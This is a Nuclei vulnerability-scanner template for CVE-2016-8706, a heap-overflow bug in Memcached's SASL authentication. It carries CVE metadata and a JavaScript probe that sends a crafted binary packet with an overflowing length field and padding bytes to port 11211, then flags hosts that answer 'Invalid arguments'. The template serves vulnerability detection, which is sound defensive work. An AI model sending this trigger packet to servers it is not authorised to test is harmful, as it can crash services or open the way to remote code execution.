60 lines
2.0 KiB
YAML
60 lines
2.0 KiB
YAML
id: CVE-2016-8706
|
|
|
|
info:
|
|
name: Memcached Server SASL Authentication - Remote Code Execution
|
|
author: pussycat0x
|
|
severity: high
|
|
description: |
|
|
An integer overflow in process_bin_sasl_auth function in Memcached, which is responsible for authentication commands of Memcached binary protocol, can be abused to cause heap overflow and lead to remote code execution.
|
|
reference:
|
|
- https://github.com/Medicean/VulApps/blob/master/m/memcached/cve-2016-8706/poc.py
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2016-8706
|
|
- http://rhn.redhat.com/errata/RHSA-2016-2819.html
|
|
- http://www.debian.org/security/2016/dsa-3704
|
|
- http://www.securitytracker.com/id/1037333
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
|
cvss-score: 8.1
|
|
cve-id: CVE-2016-8706
|
|
cwe-id: CWE-190
|
|
epss-score: 0.89998
|
|
epss-percentile: 0.98714
|
|
cpe: cpe:2.3:a:memcached:memcached:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: memcached
|
|
product: memcached
|
|
verfied: true
|
|
tags: cve,cve2016,rce,js,memcached
|
|
|
|
javascript:
|
|
- pre-condition: |
|
|
isPortOpen(Host,Port);
|
|
code: |
|
|
let packet = bytes.NewBuffer();
|
|
packet.Write(new Uint8Array([0x80, 0x21]))
|
|
let cmd = 'stats'
|
|
packet.WriteString(cmd)
|
|
packet.Pack("!H", [32]);
|
|
packet.Pack("!I", [1]);
|
|
let buzz = Array(1000).fill("A").join('');
|
|
packet.WriteString(buzz)
|
|
const c = require("nuclei/net");
|
|
let conn = c.Open('tcp', `${Host}:${Port}`);
|
|
conn.SendHex(packet.Hex());
|
|
conn.RecvString();
|
|
args:
|
|
Host: "{{Host}}"
|
|
Port: 11211
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- "Invalid arguments"
|
|
|
|
- type: word
|
|
words:
|
|
- "Auth failure"
|
|
negative: true
|
|
# digest: 4b0a00483046022100d530ec07154a983e51429b70c966e0479cf23a632a8774c3a3571aaa0d5801b20221009d852686cc74fbc1b375c6492ee8121bf7fb25b9f89848db650b67ed480f225b:922c64590222798bb761d5b6d8e72950 |